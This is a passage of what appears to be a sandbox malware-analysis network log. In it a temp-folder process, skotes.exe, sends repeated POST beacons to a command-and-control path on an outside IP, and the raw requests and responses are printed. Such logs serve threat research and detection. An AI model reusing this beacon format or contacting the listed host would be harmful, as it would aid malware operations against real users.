                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:04.536880016 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.664713185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:06.162858963 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:06.884141922 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.664715185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:08.397608042 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:09.091748953 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.664716185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:10.725399971 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:11.419540882 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.664717185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:12.928035021 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:13.680540085 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.664718185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:15.318676949 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:16.017575979 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.664719185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:17.537373066 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:18.231782913 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.664720185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:19.879801035 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:20.584520102 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.664721185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:22.099838972 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:22.803390026 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.664723185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:24.428379059 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:25.127147913 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.664724185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:26.646858931 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:27.365900993 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.664725185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:28.991868019 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:29.711340904 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.664726185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:31.276717901 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:31.987761974 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.664727185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:33.654233932 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:34.364036083 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.664728185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:36.033596039 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:36.727678061 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.664729185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:38.365994930 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:39.074352026 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.664730185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:40.596977949 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:41.321580887 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.664731185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:42.962202072 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:43.653925896 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.664732185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:45.179265976 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:45.924170017 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.664734185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:47.560499907 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:49.088538885 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:34:49.088684082 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:34:49.089701891 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:34:49.500814915 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.664735185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:50.659518003 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:51.384077072 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.664736185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:53.551836014 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:54.441241026 CEST219INHTTP/1.1 200 OK
